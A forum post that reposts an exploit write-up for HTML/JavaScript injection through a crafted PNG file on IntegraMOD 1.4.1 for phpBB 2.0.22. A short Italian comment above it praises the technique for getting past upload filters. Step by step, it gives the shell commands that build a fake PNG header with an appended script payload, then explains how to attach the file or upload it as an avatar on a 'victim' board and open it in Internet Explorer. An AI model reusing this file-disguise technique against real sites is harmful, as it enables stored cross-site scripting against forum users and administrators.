[quote]
E' piu' un bug di internet explorer che di IntegraMOD, il bug e' vecchio, pero' la tecnica di nascondere codice malleolo in un' immagine .png e' buona, ed elude parecchi upload [/quote]

[code]--------------------------------------------
= =
= Html Injetion whith image .png : IntegraMOD 1.4.1 on phpBB 2.0.22 =
--------------------------------------------
= Author : Scr34M,BlackMamba,Dr4g0n
=
= Board target : IntegraMOD 1.4.1 on phpBB 2.0.22
= =
============================================

Need to compile with Cygwin!!


Open Cygwin and write:

echo -en "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0DFICA\x00\x00\x00\x01\x00\x00\x00\x01" > hack.png

Press Enter

echo -n "<scrphpbbt>alert('Upload own By Scr34M');</scrphpbbt>" >>hack.png

Press ENTER

cp hack.png /cygdrive/c/

Go on folders C:\ and we can find hack.png with code html/javascrphpbbt all in
.

Enter on phpbb victim

Create new post and add an Attachment :

c:\hack.png

You can post and you'll look the source of page and see direct link of the image


it will be:


victim.it/files/hack_139.png <---- example


Upload:
updates the image and uplod in avatar if is Available the upload!!

We need to opend the page with IE!!!
[/code]Html Injetion whith image .png : IntegraMOD 1.4.1 on phpBB

Source viewer

Source viewer By ArmonyPHP Powered by phpBB © phpBB Group Design by phpBBStyles.com | Styles Database. Style by TD Creative for DooBDee.net.